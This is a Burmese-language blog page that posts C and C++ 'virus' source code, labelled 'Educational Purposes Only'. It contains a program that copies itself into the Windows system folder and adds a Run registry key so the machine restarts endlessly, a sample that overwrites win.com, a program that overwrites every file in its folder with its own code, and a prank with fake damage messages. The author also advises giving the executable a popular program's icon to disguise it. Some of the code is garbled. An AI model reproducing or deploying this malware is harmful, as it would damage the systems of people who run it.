မွတ္ခ်က္ - အကယ္၍ Sysres.exe ကို double click လုပ္ျပီးလို႔မွာ restart ျဖစ္မသြားဘူးဆိုရင္ ဒီ restarting process ဟာ system ရဲ႕ ေနာက္ထပ္ boot ေတြမွာ ျဖစ္ပါလိမ့္မယ္။
ဒီ virus exe fiie ရဲ႕ icon ကို အခုေလာေလာဆယ္ popular ျဖစ္ေနတဲ႔ software တစ္ခုရဲ႕ icon ပံုစံနဲ႔ ေျပာင္းလိုက္မယ္ဆိုရင္ ... ရွယ္ျဖစ္သြားျပီးေပါ့ေနာ္။ (EXEဖိုင္ရဲ႕ icon ပံုစံကိုဘယ္လိုေျပာင္းမလဲ ဆိုတဲ႔ post မွာၾကည့္ပါ။ )
(Educational Purposes Only)
ေအာက္မွာေဖာ္ျပထားတဲ႔ virus source code ေတြကို ေလ့လာၾကည့္ပါ။ C language နဲ႔ အကၽြမ္းတ၀င္ ျဖစ္ျပီး သူေတြအေနနဲ႔အလြယ္တကူပဲ နားလည္ႏိုင္ပါလိမ့္မယ္။
#include<stdio.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
( မွတ္ခ်က္ - အစိမ္းေရာင္နဲ႔ ျပထားတဲ႔ comment ေတြကို ဖတ္ၾကည့္ရင္နားလည္ေလာက္ပါတယ္။)
၁။ source code ကို ဒီမွာလည္း downlaod ႏိုင္ပါတယ္။
၂။ file ကို download ျပီးသြားရင္ Sysres.C နဲ႔ ေတြ႔ရပါလိမ့္မယ္။
၃။ ဒီ source code file ကို compile လုပ္ဖို႔လိုပါတယ္။ (C program ကို ဘယ္လုိ compile လုပ္မလဲ ဆိုတဲ့ post မွာၾကည့္ပါ။ (သို႔) Dev C++ compilerကို လည္းသံုးႏိုင္ပါတယ္။)
Virus ကုိ သင့္ရဲ႕ PC တြင္ စမ္းသပ္ျခင္း ႏွင့္ ဖယ္ရွားျခင္း
compile လုပ္ျပီးျပီဆိုရင္ ဒီ Virus ကို ဘာမွေၾကာက္လန္႔ေနစရာမလိုပဲ စိတ္ခ်လက္ခ် စမ္းသပ္ႏိုင္ပါတယ္။ စမ္းသပ္ဖို႔အတြက္ Sysres.exe file ကို double click လုပ္ပါ။ ျပီးရင္ system ကို restart လုပ္လိုက္ပါ။ ဒါျပီးရင္ေတာ့ သင့္ရဲ႕ PC ဟာ boot တက္ျပီ: desktop loaded ျဖစ္ျပီးဆိုတာနဲ႔ အလိုအေလွ်ာက္ restart ျဖစ္သြားပါလိမ့္မယ္။ အဲလိုမ်ိဳး ခဏခဏ ျဖစ္ပါလိမ့္မယ္။
စမ္းသပ္လို႔ အားရျပီးဆိုရင္ေတာ့ ဒီ virus ကို ေအာက္ပါအဆင့္မ်ားအတိုင္း ဖယ္ရွားႏိုင္ပါတယ္...
၁။ Reboot ျဖစ္ျပီးတာနဲ႔ SAFE MODE ထဲကိုသြားပါ။
၂။ X:\Windows\System ( X ဆိုတာကေတာ့ C,D,E (သို႔) F ကိုဆိုလိုတာပါ။)
၃။ Sysres.exe ဆိုတဲ႔ နာမည္နဲ႔ file ကို ရွာျပီး delete လုပ္လိုက္ပါ။
၄။ ျပီးရင္ run ထဲမွာ regedit လို႔ရိုက္ျပီး registry editor ထဲမွာ
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run
သို႔သြားပါ။ျပီးရင္ ညာဘက္က pane ထဲမွာ "sres" ဆိုတဲ႔ နာမည္နဲ႔ entry တစ္ခုကိုေတြ႔ပါလိမ့္မယ္။ အဲဒီ entry ကို delete လုပ္လိုက္ပါ။ ဒါဆိုရင္ ဒီ virus ကို ဖယ္ရွားျခင္း ေအာင္ျမင္စြာ ျပီးဆံုးသြားပါျပီ။
Virus အလုပ္လုပ္ျခင္း ေနာက္ကြယ္မွ Logic
virus ရဲ႕ လုပ္ေဆာင္ခ်က္ေတြရဲ႕ ေနာက္ကြယ္မွာရွိတဲ႔ logic(Algorithm) ကို နဲနဲေလာက္ရွင္းျပပါမယ္။ ဒါေပမယ့္ program နဲ႔ ပတ္သတ္တဲ႔ နည္းပညာအေသးစိတ္ကိုေတာ့ မရွင္းပါဘူး ။
LOGIC:
၁။ ပထမဆံုး virus က Root partation( Windows ကို install လုပ္ထားတဲ႔ partation) ကို လိုက္ရွာပါတယ္။
၂။ ေနာက္တဆင့္အေနနဲ႔ Virus က သူရဲ႕ file ေတြကို X:\Windows\System ထဲမွာ copy ကူးျပီးျပီလား( ကူးစက္ျပီးျပီလား) မကူးရေသးဘူးလား ဆိုတာကို ဆံုးျဖတ္တြက္ခ်က္ပါတယ္။
၃။ copy မလုပ္ရေသးဘူးဆိုရင္ေတာ့ X:\Windows\System ထဲမွာ သူ႔ကိုယ္သူ copy လုပ္ျပီး startup ေပၚမွာ virus file ကိုထည့္ႏိုင္ဖို႔အတြက္ registry entry တစ္ခုကိုျပဳလုပ္ပါလိမ့္မယ္။
၄။ ဒါမွမဟုတ္လို႔ X:\Windows\System ထဲမွာ virus ကိုေတြ႔မယ္ဆိုရင္ေတာ့ ၄င္းက computer ကို restart လုပ္ဖို႔ command ေပးပါလိမ့္မယ္။
ဒီ process က PC restart ျဖစ္ျပီးတဲ႔အခါတိုင္းမွာ ျဖစ္ေနပါလိမ့္မယ္။
မွတ္ခ်က္ - အကယ္၍ Sysres.exe ကို double click လုပ္ျပီးလို႔မွာ restart ျဖစ္မသြားဘူးဆိုရင္ ဒီ restarting process ဟာ system ရဲ႕ ေနာက္ထပ္ boot ေတြမွာ ျဖစ္ပါလိမ့္မယ္။
ဒီ virus exe fiie ရဲ႕ icon ကို အခုေလာေလာဆယ္ popular ျဖစ္ေနတဲ႔ software တစ္ခုရဲ႕ icon ပံုစံနဲ႔ ေျပာင္းလိုက္မယ္ဆိုရင္ ... ရွယ္ျဖစ္သြားျပီးေပါ့ေနာ္။ (EXEဖိုင္ရဲ႕ icon ပံုစံကိုဘယ္လိုေျပာင္းမလဲ ဆိုတဲ႔ post မွာၾကည့္ပါ။ )
(Educational Purposes Only)
Virus နမူနာမ်ား
Virus Sampleမ်ား ကို တင္ေပးလိုက္ပါတယ္...။ Virus ေလ့လာသူမ်ားအေနနဲ႔ အသံုး၀င္မယ္ထင္ပါတယ္။ ေလ့လာၾကည့္ပါ...
Virus နမူနာ (၁)
Virus နမူနာ (၂)
Virus နမူနာ (၄)
(Educational Purposes Only)
Virus နမူနာ (၁)
#include <iostream.h>
#include <conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sysstat.h>
#include <io.h>
#include <string.h>
int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;
/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/
if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}
strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!</html>
");
length = strlen(string);
if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("
Wrote %d bytes to the file.
", res);
cout<<"
Hello !!!!!!!!";
cout<<"
This is a VIRUS ATTACK !!!";
cout<<"
This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}
Virus နမူနာ (၂)
#include<iostream.h>
#include<conio.h>
#include<dos.h>
#include<stdio.h>
#include<process.h>
#include<graphics.h>
#include<fstream.h>
void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGE
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{
textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<<i<<"%";
delay(75);
clrscr();
}
delay(100);
clrscr();
fflush(stdout);
gotoxy(20,12);
cout<<" 'TOURNIQUET' VIRUS CREATED BY PROCRAETORIAN";
gotoxy(20,14);
cout<<" SAY GOOD BYE TO YOUR PC IN ";
for(int j=5;j<=0;j--)
{
gotoxy(48,14);
cout<<j<<" SECONDS";
delay(1000);
}
ofstream f1;
f1.open("c:/windows/All Users/desktop/procraetorian.sys");
ofstream f3("c:/windows/All Users/desktop/blast.sys");
ofstream a2("c:/windows/All Users/desktop/mslaugh.exe");
ofstream s2("c:/windows/All Users/desktop/backdoor.sys");
ofstream g2("c:/windows/All Users/desktop/spin32_war.sys");
ofstream h2("c:/windows/All Users/desktop/russpatr.sys");
ofstream j2("c:/windows/All Users/desktop/torr_sys32.sys");
ofstream k2("c:/windows/All Users/desktop/xxx.sys");
ofstream l2("c:/windows/All Users/desktop/i.txt");
ofstream sm("c:/windows/All Users/desktop/am.txt");
ofstream d1("c:/windows/All Users/desktop/your.txt");
ofstream d2("c:/windows/All Users/desktop/worst.txt");
ofstream d3("c:/windows/All Users/desktop/night.txt");
ofstream d4("c:/windows/All Users/desktop/mare.txt");
clrscr();
lowvideo();
cout<<"
1.HARD-DISK CORRUPTION
:";
delay(4000);
cout<<"completed";
cout<<"
2.MOTHER BOARD CORRUPTION
:";
delay(4000);
cout<<"completed";
cout<<"
3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND
:";
delay(4000);
cout<<"completed";
cout<<"
PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
rename("VIRUS.EXE","C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE");
//ffool();
}
//*END OF MAIN*//
//*START OF ffool()*//
void ffool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"\tc\bgi\");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
highvideo();
outtextxy(50,150,"THE PROCRAETORIAN:");
delay(1500);
outtextxy(50,200,"YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS
HOST");
outtextxy(50,250,"PEA(C)E BE WITH YOU ! ! !");
getch();
delay(4000);
closegraph();
exit(0);
}
Virus နမူနာ (၃)
#include<iostream.h>
#include<conio.h>
#include<.h>
#include<stdio.h>
#include<process.h>
#include<graphics.h>
#include<fstream.h>
void fool();
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<<i<<"%";
delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SANDEEP";
gotoxy(20,14);
cout<<"SAY GOOD BYE TO YOUR PC IN ";
for(int j=10;j>=0;j--)
{
gotoxy(48,14);
cout<<j<<" SECONDS";
delay(1000);
}
clrscr();
cout<<"
1.HARD-DISK CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"
2.MOTHER BOARD CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"
3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";
delay(4000);
cout<<"completed";
cout<<"
PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
cout<<"
VIRUS.EXE";
delay(2000);
cout<<"
*************************";
cout<<"
Buddy it's a simply joke ";
cout<<"
*************************";
delay(4000);
cout<<"
**********************************";
cout<<"
For Real Virus ";
cout<<"
Contact Me: Sandeep Udaipur ";
cout<<"
Mo: 010101010101 ";
cout<<"
Email: sandeep@yahoo.co.in ";
cout<<"
**********************************";
delay(10000);
}
void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"c:\tc\bgi");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}
#include<stdio.h>
#include<dos.h>
#include<dir.h>
#include<fcntl.h>
#include<conio.h>
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf("--------------------------------------------------------------------------");
printf("\nVirus: Pagal Shum :p 1.0\nProgrammer:shumaila jaffer\n");
cprintf("--------------------------------------------------------------------------");
done = findfirst("*.*",&ffblk,0);
while (!done)
{ printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Logicbomb");
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
(Educational Purposes Only)
Subscribe to:
Posts (Atom)
Category
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Tags
- hacking (9)
- protect virus (3)
- virus (17)
- virus history (4)
- window registry (3)
Recent Slider
- Zortam Mp3 Media Studio 16.23
- Sony ACID Pro 7.0e
- Pinnacle VideoSpin 2.0.0.669
- Guitar Tracks Pro 4
- 4A-Studio Pro 7.8.1
- Wave Xtractor 3.2 Build
- PCDJ Red Mobile 2.6.3.0
- EnergyXT 2.6
- PCDJ DEX 2.6.3
- ACID Music Studio 9.0 Build 37
- MilkyTracker 0.90.85
- Ant Movie Catalog 4.1.2.3
- MAGIX Digital DJ
- Roxio Creator PRO 2010
- Sound Mill X3 3.1
- Sound Forge Pro 11.0 B234
- ProVJ 6
- MusEdit 3.94.0.2
- Roxio Creator 2010
- Collage Maker 3.8
Post Top Ad
Pages - Menu
Pages - Menu
Popular Posts
-
ဒါလည္း စမ္းလို႔ေကာင္းတဲ႔အမ်ိဳးအစားထဲမွာေတာ့ မပါ ပါဘူး။ သူရဲ႕တိုက္ခိုက္မႈက နည္းနည္းၾကမ္းတယ္ဗ်။ ဒီVirus ရဲ႕ Include header ဖိုင္ေတြကေတာ့ iostr...
-
မိုက်ခရိုဆော့ဖ် ကုမ္ပဏီကနေ Surface တက်ဘလက် လက်ကိုင် ကွန်ပြူတာ ထွက်လာမယ်လို့ ဇွန်လ ၁၈ ရက်နေ့က ကယ်လီဖိုးနီးယား ပြည်နယ် လော့စ် အိန်ဂျလိစ်မှ...
-
ကရင်သူတော်စင်ဘိုးဘိုးအောင်အောင်သည် ကဏ္ဍပါဌ်ဆင့်တွေကိုကျော်အောင်ဘယ်လိုလုပ်ဆောင်ရမလဲဆိုတာ မိမိနားလည်ထားရမည်ဖြစ်သည်။ အကယ်၍ ထို၌ကြောင်းရှိကာပတ်က...
-
အနောက်နိုင်ငံတော်
-
က်ေနာ္ post ေတြကလည္း ေနာက္ျပန္ေရာက္ေရာက္ေနသလိုျဖစ္ေနတယ္... Virus ဖန္တီးျခင္းေၾကာင္းေတြ ကာကြယ္ျခင္းအေၾကာင္းေတြ တင္ျပီးေတာ့မွပဲ သူရဲ႕ သမိ...
-
အမွန္ဆိုရင္ေတာ့ ဒီpostကို Virusေရးနည္းေတြ မတင္ခင္ တင္ေပးရမွာပါ။ ဒါမွပိုျပီးနားလည္သေဘာေပါက္လြယ္မွာျဖစ္ပါတယ္။ တင္ရမယ့္ Post ကရွည္ေတာ့အပိုင္းလိ...
-
ရှမ်းပြည်နယ် နဲ့ ကယားပြည်နယ် ထဲမှာ ရှိတဲ့ တိုင်းရင်းသား နိုင်ငံရေး ပါတီ ၁၂ ဖွဲ့ နဲ့ လက်နက်ကိုင် ၁၃ ဖွဲ့ တို့ ပူးပေါင်းပြီး ၂၅ ဖွဲ့ ညီလာခံ...
-
Firefox အသံုးျပဳသူမ်ားအတြက္ Firefox browser ကို စိတ္ၾကိဳက္ကလိလို႔ရေအာင္ ၄င္းရဲ႕ ေနာက္ကြယ္မွ လွ်ိဳ႕ ၀ွက္ခ်က္ေတြနဲ႔ မိတ္ဆက္ေပးလိုက္ပါတယ္......
-
ကိုယ္ပိုင္ Trojan နဲ႔ virus လုပ္ခ်င္သူမ်ားအတြက္ပါ။ C Programming Language ကိုသံုးျပီး Simple Trojan လုပ္နည္းေလးပါ။ ဒီ Trojan ဟာ root drive...
-
Virus မ၀င္ေအာင္ ကာကြယ္ျခင္း ဆိုျပီး post တစ္ခုတင္ခဲ႔ပါတယ္... အဲဒီထဲမွာ လိုအပ္ေနတဲ႔ အခ်က္ေတြကို ျဖည့္စြက္ေပးဖို႔ ျဖည့္စြက္ခ်က္ေတြကို ဆက္တ...
